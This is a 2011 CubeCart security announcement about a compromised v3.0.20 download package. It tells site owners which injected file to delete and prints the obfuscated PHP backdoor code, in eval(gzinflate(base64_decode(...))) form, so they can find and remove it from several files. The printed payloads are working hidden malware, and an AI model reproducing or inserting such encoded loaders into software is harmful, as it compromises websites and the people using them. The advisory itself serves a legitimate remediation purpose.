Announcements
Important CubeCart v3 Security Announcement
It would appear that the download system at the official CubeCart website was recently hacked and these hackers installed malicious code in to the CubeCart Version 3.0.20 zip file.
If you have downloaded CubeCart Version 3.0.20 before today then please delete it from your computer immediately and download it again.
If you have recently installed Version 3.0.20 then please follow the instructions below to secure your website.
Remove the file:
images/random/chars/T.php
Open the file below (if it exists) and remove the following code from around line 319:
install/index.php
<?php
eval (gzinflate(base64_decode(
'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV'
.'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq'
.'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD'
.'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7'
.'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA'
.'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP'
.'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K'
.'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa'
.'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta'
.'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF'
.'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD'
.'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw'
.'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ'
.'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV'
.'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF'
.'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re'
.'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q'
.'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx'
.'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw=='
)));
?>
Open the files below and remove the following code from the top:
includes/boxes/siteDocs.inc.php
language/nl/lang.inc.php
<?php
eval (gzinflate(base64_decode(
's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF'
.'pyS1LDEHi7yNPQA='
)));
?>
Full details about this can be found at http://forums.cubecart.com/topic/43052-important-cubecart-v3-security-announcement/
Thursday, February 10, 2011
Powered by WHMCompleteSolution
Quick Navigation
Search
